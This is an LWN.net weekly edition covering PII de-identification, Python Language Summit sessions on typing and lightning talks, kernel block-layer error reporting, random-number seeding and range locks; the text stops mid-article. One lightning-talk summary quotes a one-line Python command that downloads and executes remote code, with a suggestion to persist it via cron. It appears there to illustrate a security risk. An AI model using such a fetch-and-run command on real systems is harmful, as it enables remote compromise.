This edition contains the following feature content:

This week's edition also includes these inner pages:

Brief items: Brief news items from throughout the community.

Announcements: Newsletters, conferences, security updates, patches, and more.

Please enjoy this week's edition, and, as always, thank you for supporting LWN.net.

Comments (6 posted)

There is no viable way to prevent data from being collected about us in the current age of computing. But if institutions insist on knowing our financial status, purchasing habits, health information, political preferences, and so on, they have a responsibility to keep this data—known as personally identifiable information (PII)—from leaking to unauthorized recipients. At the 2017 Strata data conference in London, Steve Touw presented a session on privacy-enhancing technologies. In a fast-paced 40 minutes he covered the EU regulations about privacy, the most popular technical measures used to protect PII, and some pointed opinions about what works and what should be thrown into the dustbin.

To jump straight to Touw's conclusions: we need to maintain much tighter control over data that we share. Like most who have studied the question of PII, Touw finds flaws in current forms of de-identification, which is the technique we rely on most often for protecting PII. He suggests combining de-identification techniques with a combination of restrictions on the frequency and types of queries executed against data sets, along with a context-based approach to data protection that is much more sophisticated than current access controls.

No one would have enough time to explain thoroughly all the issues in protecting PII. Touw focused on European legal requirements (which made sense for a conference held in London), technical difficulties in de-identifying data, and good organizational practices for protecting privacy. This article fills out some of the background underlying these issues as well.

Common constraints on data collection

Although people viscerally fear the collection of personal data, and alternatives such as Vendor Relationship Management have been suggested for leaving control over data in the hands of the individual, there are few barriers in the way of organizations that collect this data. The EU has regulated data collection for decades, and its General Data Protection Regulation (GDPR), which is supposed to come into force on May 25, 2018, requires limitations that are familiar to those in the privacy field. These include minimization, data retention limits, and restrictions on use to the original purpose for collecting the data. I'll offer a brief overview of these key concepts.

Minimization means collecting as little data as you can to meet your purpose. If you need to know whether someone is old enough to drive, you can record that as a binary field without recording the person's age. If you need to know how many cars pass down a street each day in order to plan traffic flow, you don't need to record the license plates of the cars.

Data retention limits are a form of minimization. Most data's value diminishes greatly after a few months. For instance, a person's income may change, so income information collected a year ago may no longer be useful for marketing. Therefore, without much of a sacrifice in accuracy, an organization can protect privacy by discarding data after a certain time interval.

Restricting use to the original purpose of data collection is an even stricter criterion. Supposedly it would mean that a retailer who collects your information in order to charge your credit card should not use that information to improve its marketing campaigns.

Governments in the US impose restrictions only on specific classes of information, such as data collected by health care providers. Fair Information Practices, which cover some broad issues such as transparency and the right to correct errors, are widely praised but not required by law. They also go nowhere near as far as EU laws in granting rights to individuals for their data.

Although the GDPR does not require organizations to obtain consent for data collection, Touw advised them always to do so. Otherwise, the organizations may be asked to demonstrate in court that they had a "legitimate interest" in the data, which is a subjective judgment. Touw did not go into the problems of consent forms, so his advice was really aimed at protecting the company doing the collection, not the individuals.

The dilemma of data sharing

Protection of personal data takes place on two levels: while storing it at the site collecting the data, and while granting access to other parties. Why would sites offer data to other parties? Touw did not cover this question, but there are a few reasons behind that practice.

Organizations can realize a large income stream from selling the data, which can then be used for purposes ranging from benign to ill. Governments collect and share data that is supposed to be for the public benefit (e.g. race and gender, incidences of communicable diseases). Public agencies, and even some companies, believe their data could contribute to initiatives in health, anti-corruption efforts, and other areas. Some institutions also anticipate that they might benefit from tools developed by others. Thus, Netflix released data on who viewed its video content for the Netflix prize of 2009, hoping to get a better algorithm for video recommendations from experts in the field.

When data is shared publicly, the organization tries to strip direct identifiers, such as names and social security numbers, and tries to reduce the risk that indirect identifiers such as postal codes can be used to re-identify individuals. Even when organizations sell their data privately, they often try to de-identify it in similar ways. The GDPR gives organizations pretty much free rein to use and release data, so long as it is correctly de-identified.

Problems with de-identification

The bulk of Touw's talk was devoted to the risks of de-identification, also known as anonymization. His skepticism about de-identification is shared by most experts in computing who have examined the field. In particular, he looked at techniques for pseudonymity and K-anonymity, claiming that they can't prevent re-identification unless they're pursued so far that they render the output data useless.

Touw predicted that organizations will stop releasing free, de-identified data sets, because de-identification has too often proven insufficient and too many embarrassing breaches have been publicized. Besides the Netflix prize mentioned earlier, where researchers re-identified Netflix users from the data [PDF], Touw mentioned some other open data sets and spent a good deal of time on New York City taxi data.

All these re-identification attacks depended on the mosaic effect, or finding other publicly available sources and joining them with the released data set. (Touw called this a "link attack.") In the case of the New York taxi data, most of us would have nothing to fear, but celebrities who are sighted at the beginning or end of their rides could potentially be re-identified. Touw claimed that New York City could not have prevented the re-identification by fuzzing or removing fields from the data, a point also made by the researcher who originally performed the re-identification attack. I believe Touw moved the goalposts a bit by adding new sources of information to fuel possible attacks as he removed existing information. Still, he made a case that the only way to protect celebrities would be to remove everything of value from the data.

Pseudonymization is the easiest way to de-identify data. It consists of putting a meaningless value in place of a personally identifying field. People may still be re-identified, though, if they possess unique values for other fields. For instance, if someone is the only Hispanic person in a particular apartment building, a combination of race and address can identify them. If someone suffers from a rare disease, a hospital listing with diagnoses may reveal sensitive information to someone who knows they have that disease.

K-anonymity addresses the problem of unique values, known also as high cardinality values. The technique makes sure there are enough duplicate values in different rows of data so that no individual is identified by a particular combination of fields. K-anonymity works by making values in fields more general: a common example is offering just the first three digits of a five-digit ZIP code. Because the digits are hierarchical (the code 200 is a single contiguous geographic area that contains 20001, 20002, etc.), generalizing the ZIP code exposes data that is still useful but is less specific.

Touw briefly mentioned two enhancements to K-anonymity, known as L-diversity and T-closeness, that are more restrictive. L-diversity [PDF] restricts the number of unique values in information by taking into account the probability that an attacker can guess something about the target (such as their address). T-closeness [PDF] tries to prevent re-identification by making sure that each division in the data (such as ZIP code) contains sensitive values with about the same frequency as the general population. Touw claimed L-diversity and T-closeness are more trouble than they're worth, and that all these techniques leave people at risk of re-identification unless the data is generalized to the point where it's worthless.

When you listen to data scientists like Touw who have investigated the limitations of anonymization, you come away feeling that there's no point to doing it. But let's step back and consider whether this is a constructive conclusion. Nearly all published examples of re-identification took advantage of poor de-identification techniques. Done right, according to proponents, de-identification is still safe. On the other hand, it's easy for proponents of de-identification to say that a technique was flawed after the fact.

To resolve the dilemma, one can look at de-identification like encryption. We can be fairly certain that, within a few decades, increased computing power and new algorithms will allow attackers to break our encryption. We keep increasing key sizes over the decades to compensate for this certainty. And yet we keep using encryption, because nothing better exists. De-identification is still worth using too. But Touw has some alternative ways to carry it out.

Proposed remedies

In addition to advising that organizations obtain consent for data collection, Touw offered two practices that are more effective than the previous methods of data protection: restricting data requests to a safe set of queries and using context-based restrictions. Neither practice is in common use now, but models exist for their use.

If an organization does not release data in the open, it can achieve some of the organizational and social benefits of open data by offering a limited set of queries to third parties. Touw promoted the concept of differential privacy, which is a complex technology understood by relatively few data experts. The concept has been attributed [PDF] to Cynthia Dwork, who co-authored a key paper [PDF] laying out the theory. She explains differential privacy there (on page 6) by saying, "it ensures that any sequence of outputs (responses to queries) is 'essentially' equally likely to occur, independent of the presence or absence of any individual." It never reveals any specific fields in the underlying data, but provides a set of aggregate queries—such as sums or averages—that mathematical analysis of the data set have shown to be privacy-preserving.

Touw demonstrated how a specific value for a specific person might be obtained by asking the same question—or to disguise the attack, many questions that differ slightly—over and over. Each question produces a slightly different result in the field you're interested in, but if you take the average of these results you can get very close to the original value. So some form of rate-limiting must be imposed on queries.

Touw's other major recommendation involves context-based or purpose-based restrictions, which he called "the future of privacy controls". They go far beyond individual or group access controls used by most sites.

One example of context-based restrictions is time-based access. A conventional employer might allow access by its employees from 9:00 AM to 5:00 PM. In a more flexible environment, such as a hospital where nurses' shifts have irregular beginnings and ends, the hospital may allow each nurse access to data when their schedule indicates they are on duty.

Another type of context-based restriction is based on granting users limited access to data based on a license that spells out what they want to do (say, cancer research) and how they can use data. If the user starts issuing requests for certain combinations of rows or columns that don't seem to fulfill the basis for which the license was granted, access can be denied.

Touw advises organizations not to try to combine all their data in a single data lake—or worse still, to copy data into a new repository in order to perform access controls. Maintaining two copies of data is always cumbersome and error-prone. In addition, you now offer attackers twice the opportunities to break into the data. Instead, he suggests an organizational set up what he calls a "data control plane". It implements all the policies defined by the organization and covers all data stores. The control plane should expose easy ways to create rules, make sure new policies take effect immediately, recognize the types of context mentioned earlier, and maintain audits that show what the data was used for. Organizations must also exercise governance over data so they know who owns it, who has access to it and under what circumstances, and how to manage the data's lifecycle (acquiring, storing, selling, purging). They can't just rely on the IT department to define and implement policies.

Few if any commercial vendors offer the advanced privacy-protecting technologies recommended by Touw. So at this point, attackers run ahead of most organizations that maintain data on us. Still, Touw's talk opens up a valuable debate about what real privacy protection looks like in 2017.

Comments (45 posted)

Mark Shannon is concerned that the Python core developers may be replaying a mistake: treating two distinct things as being the same. Treating byte strings and Unicode text-strings interchangeably is part of what led to Python 3, so he would rather not see that happen again with types and classes. The Python typing module, which is meant to support type hints, currently implements types as classes. That leads to several kinds of problems, as Shannon described in his session at the 2017 Python Language Summit.

He wanted to convince people that the typing module is "heading in the wrong direction". He is not opposed to type hints or variable annotations, but is concerned that the typing module is conflating types and classes in a way that is detrimental. Classes are for object-oriented programming, while types declare what something is. A class can be a subclass of another without being a subtype of it. List[int] and List[float] (lists of integers and floating point numbers, respectively) are distinct types, he said, but are both implemented by the list class. In the current typing module, types are implemented as classes.

This has happened before, with bytes and Unicode in the Python 2 days, Shannon said. He would rather see this get addressed now, before the core developers (and the language) get to that point again.

Practical problems

Using classes for types has some concrete negative effects. Classes are "large and bad" in CPython, but are much worse for MicroPython. A namedtuple -based implementation of List[int] is around 1/60 the size of the class-based one.

There are also some oddities. He showed two class definitions:

class MyList(Sequence[int], list): pass class MyList(list, Sequence[int]): pass

MyList

builtins.list

Sequence[int]

In both cases,inherits fromand the sequence of integers type (), but a simple append operation on an instance of one of them is 10% faster than on an instance of the other.

It turns out that the method resolution order (MRO) comes into play. MRO determines which method actually gets called when multiple inheritance is used; Python tracks that on the __mro__ attribute. For a class that inherits builtins.list , the MRO has three items, but for List[int] it has 17.

Types and type constructors are already hard enough to understand, he said. Turning them into classes and metaclasses just makes that worse. In addition, since types in typing already have a custom metaclass, it makes it difficult to define a type for a class that has its own custom metaclass.

When adopting type hints, the core developers made a few promises, Shannon said. Type hints would allow programs to be checked for type errors, they would always be optional, and using them should not slow your program down. The first two of those have been kept, but the last has not. Every time you run a program with type hints, it pulls in large chunk of code that slows things down.

Options

He presented three options. The first was to continue using types as classes, but to painfully check that an instance of Iterable(int) actually produces integers for each entry. Then hope that things don't get as bad as they did for bytes and Unicode. Another was "the status quo"; much the same as the first, but to ignore the checks that seem expensive. The option that he prefers is to keep types and classes distinct, which will remove the "conceptual muddle" and reduce the run-time overhead of using types. He has a minimal prototype implementation on GitHub to demonstrate what he means.

Attendees were generally supportive of his ideas; Guido van Rossum filed a bug for typing on some of the issues he raised. There were also suggestions on ways to reduce the overhead for code that uses type hints. Łukasz Langa noted that Instagram had reduced the size of compiled Python (i.e. bytecode) by 1.5% just by removing the docstrings; perhaps something similar could be done to remove the type annotations to reduce the size of the code.

[I would like to thank the Linux Foundation for travel assistance to Portland for the summit.]

Comments (none posted)

In his 2017 Python Language Summit session, Jukka Lehtosalo updated attendees on the status of type checking for the language, in general, and for the mypy static type checker. There are new features in the typing module and in mypy, as well as work in progress and planned features for both. For a feature, type hints, that is really only around three years old, there has been a lot of progress made—but, of course, there is still more to come.

The most significant new thing for types in Python is the adoption of PEP 526, which adds a way to annotate variables with their types. As of Python 3.6, variable annotations can be used for regular variables, instance variables, and class variables. The latter is made possible with the ClassVar[] annotation that has been added to typing . Other additions include NewType() for creating distinct types and NoReturn for functions that do not return.

Some recent mypy features include function overloads in source files (and not just stub files) and basic metaclass support, but there is still work to be done on the latter. There is also a new "quick mode" that is up to ten times faster. Quick mode is an incremental check; it just looks at the file itself and assumes that what it imports does not need to be checked.

There are also some experimental mypy features that Lehtosalo mentioned. The mypy_extensions module contains various extensions to typing that are being tried out. Some of those may get promoted to typing if they work out. One of those is the more flexible Callable[] type, which has a syntax that is "not pretty" but works. More information about these and other features can be found in his mypy 0.510 release announcement.

There are also some features in progress for mypy, he said. The TypedDict type, which will allow dictionaries that specify the types of values for specific keys, is one. Another is support for structural subtyping using Protocols . There are some planned improvements for type variables, including adding support for variadic type variables and for variables that describe function argument specifications. Decorators sometimes change a function's signature, so support for declaring the decorated type of a function is planned as well.

Mypy is starting to be used in production. At Dropbox, where Lehtosalo works, 700,000 lines of code have been annotated and are being checked with mypy. The Zulip project has 95,000 lines of code annotated; Facebook, Quora, and others are using the tool as well. There has been quite a bit of positive user feedback, he said. Performance is still an issue, however; a full run at Dropbox takes around two minutes, which is "barely acceptable". But a large scale roll-out at Dropbox is under way.

There were some lessons learned along the way. To start with, changing type systems is "very expensive" and causes a fair amount of pain for users. That means Dropbox may become stuck with some early choices it made before some features had been added to typing and mypy. Having the typing module in the standard library has turned out to be annoying, because there are new features in the 3.6 release that can't be used in 3.5, which is the version used by Dropbox. typing is moving fast, so sometimes it makes sense to backport features into earlier versions, he said.

There are a lot of contributors to the projects (both typing and mypy), especially for typeshed , which collects annotations for Python built-ins and the standard library. The two other major type checkers, pytype and PyCharm, also contribute, so there is a real community building up around type annotations.

Mark Shannon asked when the project would decide to stop adding features for ever-more-obscure type constructs; "at what point do you say 'just use Any '?" Lehtosalo said that the project tends to consider constructs that have multiple users and uses throughout the ecosystem and is not interested in adding support for lots of one-off corner cases.

[I would like to thank the Linux Foundation for travel assistance to Portland for the summit.]

Comments (none posted)

Over the course of the day, the 2017 Python Language Summit hosted a handful of lightning talks, several of which were worked into the dynamic schedule when an opportunity presented itself. They ranged from the traditional "less than five minutes" format to some that strayed well outside of that time frame—some generated a fair amount of discussion as well. Topics were all over the map: board elections, beta releases, Python as a security vulnerability, Jython, and more.

MicroPython versus CPython

The first entry here was not actually billed as a lightning talk, but it fits the model pretty well. Mark Shannon briefly described some of the differences between MicroPython and the CPython reference implementation right after lunch. MicroPython is an implementation of the language that targets microcontroller hardware; LWN looked at it running on the pyboard development hardware back in 2015.

Larry Hastings introduced the session by noting that MicroPython is the first competing implementation that has Python 3 support. Shannon held up a BBC micro:bit board, which runs MicroPython and has been given to students in the UK, and noted that it only has 16KB of memory. He asked how many attendees had 16GB in their laptops and got a few hands.

MicroPython is a severely memory-constrained version of Python 3, but it does come with most of the standard library. In fact, it has asyncio support, for example. It is not CPython, but is a completely new implementation of the language. The micro:bit has 256KB of flash memory and MicroPython runs from the flash. Most of the data is immutable and lives in flash as well. Hastings noted that MicroPython has a tracing garbage collector, rather than using reference counting as CPython does.

Michael Foord spoke up to extol the micro:bit device, which costs around $20. It is "easy to play with" and has almost all of the features of Python, including the dynamic features. There is a book coming out in June about it. Overall, "it is a great, fun thing to experiment with."

PSF board

In the first real lightning talk, Hastings had a suggestion for the assembled core developers: run for the Python Software Foundation (PSF) board of directors. He noted that the 2006-2007 board was dominated by core developers (seven out of eight), while the 2016-2017 board has a single core developer (Kushal Das).

He said that he thought it would be "lovely to see more core developers" on the board, so he asked those present to nominate themselves (or other core developers) by the May 25 deadline, which was one week away when he gave the talk. When Hastings was asked if he would be running, though, he said "I don't have time for that" with a bit of a grin. In the end, the board nominations have closed; there are two core developers (Das and Thomas Wouters) on the list, which has 22 entries for 11 seats.

Why beta?

Łukasz Langa questioned the value of the beta phase for Python releases in his lightning talk. He asked: "did your company use the beta of 3.6?" The beta period is nearly five months long and is meant to "surface issues" in the code, but he is not really sure that is happening. So he is concerned that the project is not using that time well.

Furthermore: "what is the point of the 3.6.x point releases?" He wondered if a stable branch would better serve the community. But many attendees responded that the point releases were valuable and that an always-stable branch would not suit their needs.

Where Langa works, at Facebook, the point releases have not been all that helpful; they introduce regressions and "some are pretty bad". His perspective may be somewhat skewed, however, since his code base is heavily dependent on the asyncio and typing modules. But, by running his tests on code from the 3.6 branch, he was able to find a bug that was introduced after 3.6.0 and get it fixed before 3.6.1 was released.

He suggested that more people start testing before the releases are made. He has already been doing some testing on the 3.7 branch, for example. He noted that Brett Cannon has a blog post about doing that. Core developers should also be aware that there are some people out there testing what is getting committed to stable, and even development, branches.

Barry Warsaw noted that Linux distributions use the betas and release candidates as they prepare for their releases. Ned Deily said that getting "more eyes on daily builds" would be great, but the point releases are important because of all the different platforms that need to be supported. But Langa is not advocating getting rid of the point releases; since there are no betas for point releases, he wants to see more testing before the release. But point releases are only for bug fixes, Deily said, not for new features. Langa is concerned that point releases also introduce regressions, however.

The beta release provides an important psychological barrier for developers, Guido van Rossum said, it is not meant for customers. Another attendee pointed out that the release candidate(s) for point releases are effectively the betas for those releases. But there is little testing of betas or release candidates, Langa said; there are always small things that are wrong and clearly have not been tested.

Beta releases do provide a platform for third-party developers, though, Deily said. Libraries and modules can test with them to ensure their code will work with the upcoming release. Python upstream does make that available, Langa said, but the external world is not really using it. The alternative is for the Python project to do more of that testing itself, Deily said.

Stable branches open up another pitfall, though, an attendee said. For example, at one point NumPy added a feature in its Git repository that needed to be changed fairly soon afterward. Unfortunately, SciPy had committed its own change based on that code, so NumPy had to carry backward compatibility hacks for a feature that was never intended to be stable. Once something has been committed to a stable branch in Git, people assume that it is completely baked; "if it breaks later, it is our problem".

Another attendee suggested that other projects are not likely to test with a beta release, but might with a release candidate. That led Hastings to jokingly suggest that Python "just cross out the word beta and replace it with rc [release candidate]". "In crayon", Warsaw added with a grin.

Ordered dictionaries

CPython 3.6 changed its dictionary implementation to one that is more compact, so it uses less memory, but that also preserves the order that keys are inserted. That resolves PEP 468, which is about preserving the order of keyword arguments in the dictionary passed to functions, but it may have an unintended side effect as well. Gregory P. Smith wanted to discuss that in his lightning talk.

Smith is concerned that Python code will start to rely on the fact that dictionary insertion order is preserved, which is, for now, simply a CPython implementation decision. Other Python implementations may make other choices, so some code could break unexpectedly. He wondered if a change should be made for Python 3.7.

In particular, he suggested that the iteration order for dictionaries could be changed slightly. Those that need ordering could use collections.OrderedDict explicitly. He said that the disordering does not need to be random, necessarily, though that would be fine, it just needs to change the order enough so that reliance on ordering would be picked up in testing.

He suggested that, for 3.7, either the ordering be broken or that Python declare that all dictionaries must be ordered. If the latter is done, would there be a need for an UnorderedDict , an attendee asked. Smith did not think there would be any users for that, but it could be done if needed. The issue is now on the core developers' radar, but no firm conclusion was reached in the talk.

Python as a security vulnerability

Steve Dower had a provocative title for his lightning talk: "Python is a Security Vulnerability". His point was that Python (and other, similarly powerful languages) installed on a system gives attackers a tool that can be easily used to further their aims. Normally, when we think of security vulnerabilities, we think of things like buffer overruns, but in some sense, the Python language and its libraries also qualify.

He said he often hears statements like "I love it when I find a system with Python installed ... it's basically already owned". Red teams and penetration testers love to find Python on systems they access, he said. As a thought experiment, he posited that if you could somehow get one shell command executed on a workstation inside the US National Security Agency (NSA), that command might well be something like:

python -c "exec(urlopen(...).read())"

cron

Adding it as ajob would be even more effective.

So, what should be done about this? The Python core development community needs to acknowledge the problem; it is the reason that many corporate networks ban Python, for example. The community should also look for ways to change Python to make things better. Creating a locked-down version of the language and libraries to make it harder for attackers to abuse might be something to consider.

PyCharm update

A brief update on the PyCharm integrated development environment (IDE) for Python was up next. Dmitry Trofimov and Andrey Vlasovskikh noted that for the first time, Python 3 use was larger than that of Python 2 in PyCharm. Almost all of the Python 2 use is 2.7, while Python 3 has mostly 3.5 and 3.6 users, though there is a lingering contingent of 3.4 users.

The PyCharm debugger now supports the PEP 523 frame evaluation API. That has sped up the debugger by 20x; it started out as a 40x improvement, but that dropped to the current level when a subtle bug was fixed. It is a rare PEP that affects the debugger, they said; there should be more of those. The API should also be considered for backporting to 2.7, they said.

They also wanted to point out the new profiler for Python, VMProf (documentation here). It was developed by the PyPy project with cooperation from JetBrains, which is the company behind PyCharm. VMProf is a native profiler for Python that runs on macOS, Windows, and Linux.

Jython

The final lightning talk was given by Darjus Loktevic, who lamented the sad state of the Jython project, which is an implementation of Python for the Java virtual machine. Jython is still under development, he said, but it has a small team (2-5 active developers). The project is close to releasing Jython 2.7.1, which is more or less the same as CPython 2.7.11. It has a Jython Native Interface (JyNI) that can be used to run Python's C extensions (e.g. NumPy) in Jython.

But, he asked, is Jython still relevant today? The question came up in a Reddit thread recently, he said. The problem with Jython is that it is not Python enough to run things out of the box—tests fail, little bits and pieces are different or not supported. On the other hand, Jython is not Java enough either; it is not a great scripting language for Java and it is stuck on 2.7, which is not that great, he said.

The "killer features" for Jython are that it can call Java classes from Python code and that it lacks a global interpreter lock (GIL). Jython has had no GIL for a long time, but no one seems to care, Loktevic said. Maybe more would care if some of the other features were sorted out better.

Going forward, there will be an effort to make JyNI better, so that more C extensions can run. Also, the clamp project will allow Python code to be compiled into Java jar files so it can be directly imported into Java. Jython plans to move to GitHub and reuse the core workflow. His talk had to wind down rather abruptly at that point as the summit had run more than an hour late.

[I would like to thank the Linux Foundation for travel assistance to Portland for the summit.]

Comments (13 posted)

The kernel's filesystem and block layers are places where a lot of things can go wrong, often with unpleasant consequences. To make things worse, when things do go wrong, informing user space about the problem can be difficult as a consequence of how block I/O works. That can result in user-space applications being unaware of trouble at the I/O level, leading to lost data and enraged users. There are now two separate (and complementary) proposals under discussion that aim to improve how error reporting is handled in the block layer.

Block-layer error codes

One problem with existing reporting mechanisms is that they are based on standard Unix error codes, but those codes were never designed to handle the wide variety of things that can go wrong with block I/O. As a result, almost any type of error ends up being reported back to the higher levels of the block layer (and user space) as EIO (I/O error) with no further detail available. That makes it hard to determine, at both the filesystem and user-space levels, what the correct response to the error should be.

Christoph Hellwig is working to change that situation by adding a dedicated set of error codes to be used within the block layer. This patch set adds a new blk_status_t type to describe block-level errors. The specific error codes added thus far correspond mostly to the existing Unix codes. So BLK_STS_TIMEOUT , indicating an operation timeout, maps to ETIMEDOUT , while BLK_STS_NEXUS , describing a problem connecting to a remote storage device, becomes EBADE ("invalid exchange"). There is, according to Hellwig, "some low hanging fruit" that can be improved by additional error codes, but those codes are not added as part of this patch set.

The new errors can be generated at the lowest levels of the kernel's block drivers, and will be propagated to the point that filesystem code sees them in the results of its block I/O requests. To get there, the bi_error field in struct bio , which contained a Unix error code, has been renamed to bi_status . In-tree filesystems have been changed to use the new field, but they do not yet act on the additional information that may be available there.

This is, in other words, relatively early infrastructural work that makes it possible for the block layer to produce better error information. Actually making use of that infrastructure will have to wait until this work is accepted and headed toward the mainline.

Reporting writeback errors

One particular challenge for block I/O error reporting is that many I/O requests are not the direct result of a user-space operation. Most file data is buffered through the kernel's page cache, and there can be a significant delay between when an application writes data into the cache and when a writeback operation flushes that data to persistent storage. If something goes wrong during writeback, it can be hard to report that error back to user space since the operation that caused that writeback in the first place will have long since completed. The kernel makes an attempt to save the error and report it on a subsequent system call, but it is easy for that information to be lost with the result that the application is unaware that it has lost data.

Jeff Layton's writeback-error reporting patches are an attempt to improve this situation. He adds a mechanism that is based on the idea that applications that care about their data will occasionally call fsync() to ensure that said data has made it to persistent storage. Current kernels might report a writeback error on an fsync() call, but there are a number of ways in which that can fail to happen. With the new mechanism in place, any application that holds an open file descriptor will reliably get an error return on the first fsync() call that is made after a writeback error occurs.

To get there, the patch set creates a new type ( errseq_t ) for the reporting of writeback errors. It is a 32-bit value with two separate fields: an error code (of the standard Unix variety) and a sequence counter. That counter tracks the number of times that an error has been reported in that particular errseq_t value; kernel code can remember the counter value of the last error reported to user space. If the counter increases on a future check, a new error has been encountered.

The errseq_t variables are added to the address_space structure, which controls the mapping between pages in the page cache and those in persistent storage. The writeback process uses this structure to determine where dirty pages should be written to, so it is a logical place to store error information. Meanwhile, any open file descriptor referring to a given file will include a pointer to that address_space structure, so this errseq_t value is visible (within the kernel) to all processes accessing the file. Each open file (tracked by struct file ) gains a new f_wb_err field to remember the sequence number of the last reported error.

Storing that value in the file structure has an important benefit: it makes it possible to report a writeback error exactly once to every process that calls fsync() on that file, regardless of when they make that call. In current kernels, only the first caller after an error occurs has a chance of seeing that error information. It would arguably be better to report the error only to the process that actually wrote the data that experienced the error, but tracking things at that level would be cumbersome and slow. By informing all processes, this mechanism ensures that the right process will get the news.

The final step is to get the low-level filesystem code to use the new reporting mechanism when something goes wrong. Rather than convert all filesystems at once, Layton chose to add a new filesystem-type flag ( FS_WB_ERRSEQ ) that can be set for filesystems that understand the new scheme. Code at the virtual filesystem layer can then react accordingly depending on whether the filesystem has been converted or not. The intent is to remove this flag and the associated mechanism once all in-tree filesystems have made the change.

The ideas behind this patch set were discussed at the 2017 Linux Storage, Filesystem, and Memory-Management Summit in March; the patches themselves have been through five public revisions since then. There is a reasonable chance that they are approaching a sort of final state where they can be considered for merging in an upcoming development cycle. The result will not be perfect writeback error reporting, but it should be significantly better than what the kernel offers now.

Comments (39 posted)

Many bytes have been expended over the years discussing the virtues of the kernel's random number generation subsystem. One of the biggest recurring concerns has to do with systems that are unable to obtain sufficient entropy during the boot process to meet early demands for random data. The latest discussion on this topic got off to a bit of a rough start, but it may lead to an incremental improvement in this area.

Jason Donenfeld started the thread with a complaint that /dev/urandom will, when read from user space, return data even if the kernel's internal entropy pool has not yet been properly seeded. In such a case, it is theoretically possible for an attacker to predict the not-so-random data that will be returned. He asserted that /dev/urandom should simply block until the entropy pool is ready, and dismissed the reasoning behind the current behavior: "Yes, yes, you have arguments for why you're keeping this pathological, but you're still wrong, and this api is still a bug."

Bug or not, as Ted Ts'o pointed out, making /dev/urandom block causes distributions like Ubuntu and OpenWrt to fail to boot. That sort of behavioral change is typically called a "regression", and regressions of this sort are not normally allowed. So /dev/urandom will retain its current behavior. But that isn't the point Donenfeld was really trying to address anyway. The real issue, as it turns out, has to do with getting random data from within the kernel instead of from user space. That can be done with a call to:

void get_random_bytes(void *buf, int nbytes);

This function will place nbytes of random data into the buffer pointed to by buf ; it will do so regardless of whether the entropy pool is fully initialized. So, once again, it is possible to get data that is not truly random. Since this function is called from inside the kernel, those calls can happen early in the boot process, so the chance of encountering an insufficiently random entropy pool are relatively high.

This problem is not unknown to the kernel development community, of course. In 2015, Stephan Mueller proposed the addition of a version of get_random_bytes() that would block until the entropy pool is ready, should that be necessary. That idea ran into trouble, though, when Herbert Xu pointed out that it could lead to deadlocks — just the sort of random event that tends not to be of interest. So, instead, a callback interface was created. Kernel code that wants to ensure that it gets good random data starts by creating a callback function and placing a pointer to that function in a random_ready_callback structure:

struct random_ready_callback { struct list_head list; void (*func)(struct random_ready_callback *rdy); struct module *owner; };

That structure is then passed to add_random_ready_callback() :

int add_random_ready_callback(struct random_ready_callback *rdy);

When the random-number subsystem is ready, the given callback function will be called. By adding some more structure (most likely using a completion), the calling code can create something that looks like a synchronous function to get random data.

As Donenfeld pointed out, this interface is a little bit on the cumbersome side, which may have something to do with the fact that it has exactly one call site in the kernel. He suggested that it might make sense to add a synchronous interface that could be used in at least some situations; that would make it possible to fix some places in the kernel that are at risk of using nonrandom data. Ts'o agreed that this approach might make sense:

Or maybe we can then help figure out what percentage of the callsites can be fixed with a synchronous interface, and fix some number of them just to demonstrate that the synchronous interface does work well.

The end result was a patch series from Donenfeld adding a new function:

int wait_for_random_bytes(bool is_interruptable, unsigned long timeout);

As its name might suggest, wait_for_random_bytes() will wait until random data is available. If is_interruptable is set, the function will return early (with an error code) should the calling process receive a signal. The timeout parameter can be used to put an upper bound on how long the call will wait. This functionality turned out to be a bit more than was needed, though; in particular, Ts'o expressed skepticism about the timeout idea, asking: "If you are using get_random_bytes() for security reasons, does the security reason go away after 15 seconds?" The third version of the patch set removed all of the arguments to wait_for_random_bytes() , making all waits interruptible with no timeout.

The patch series then adds a set of convenience functions to combine waiting and actually getting the random data, including:

static inline int get_random_bytes_wait(void *buf, int nbytes);

Most of the comments on the patch set at this point are about relatively minor issues. So chances are that some version of this patch set will find its way into the kernel eventually, with the result, hopefully, that there will be a reduced chance of kernel code using insufficiently random data. But there is one other aspect of this situation that seems entirely deterministic: the arguments about the quality of the kernel's random-number subsystem are far from finished. That is, after all, the fundamental problem with random numbers: it is difficult to be sure that they are truly random.

Comments (39 posted)

The kernel uses a variety of lock types internally, but they all share one feature in common: they are a simple either/or proposition. When a lock is obtained for a resource, theresource is locked, even if exclusive access is only needed to a part of that resource. Many resources managed by the kernel are complex entities for which it may make sense to only lock a smaller part; files (consisting of a range of bytes) or a process's address space are examples of this type of resource. For years, kernel developers have talked about adding "range locks" — locks that would only apply to a portion of a given resource — as a way of increasing concurrency. Work has progressed in that area, and range locks may soon be added to the kernel's locking toolkit.

Jan Kara posted a range-locking mechanism in 2013, but that work stalled and never made it into the mainline. More recently, Davidlohr Bueso has picked up that work and extended it. The result is a new form of reader/writer lock — a lock, in other words, that distinguishes between read-only and write access to a resource. Reader/writer locks can increase concurrency in settings where the protected resource is normally accessed by readers, since all readers can run simultaneously. Whenever a writer comes along, though, it must have exclusive access to the resource. Balancing access between readers and writers can be a tricky business where the wrong decisions can lead to starvation, unfairness, or poor concurrency.

Since range locks only cover part of a resource, there can be many of them covering separate parts of the resource as a whole. The data structure that describes all of the known range locks, including those that are waiting for the needed range to become available, for a given resource is a "range lock tree", represented by struct range_lock_tree . This "tree" is the lock that protects the resource as a whole; it will be typically located in or near the relevant data structure where one would otherwise find a simpler lock. Thus, a range-locking implementation will tend to start with something like:

#include <linux/range_lock.h> DEFINE_RANGE_LOCK_TREE(my_tree);

Given the range_lock_tree structure to protect the resource, a thread needing access to a portion of that resource will need to acquire a lock on the range of interest. A lock on a specific range (whether granted or not) is represented by struct range_lock . It is possible to declare and initialize a range lock statically with either of:

DEFINE_RANGE_LOCK(my_lock, start, end); DEFINE_RANGE_LOCK_FULL(name);

The second variant above will describe a lock on the entire range. It is also possible to initialize a range_lock structure at run time with either of:

void range_lock_init(struct range_lock *lock, unsigned long start, unsigned long end); void range_lock_init_full(struct range_lock *lock);

Actually acquiring a range lock requires calling one of a large set of primitives. In the simplest case, a call to range_read_lock() will acquire a read lock on the indicated range, blocking if necessary to wait for the range to become available:

void range_read_lock(struct range_lock_tree *tree, struct range_lock *lock);

The lock for the entire resource is provided as tree , while lock describes the region that is to be locked. Like most sleeping lock primitives, read_range_lock() will go into a non-interruptible sleep if it must wait. That behavior can be changed by calling one of the other locking functions:

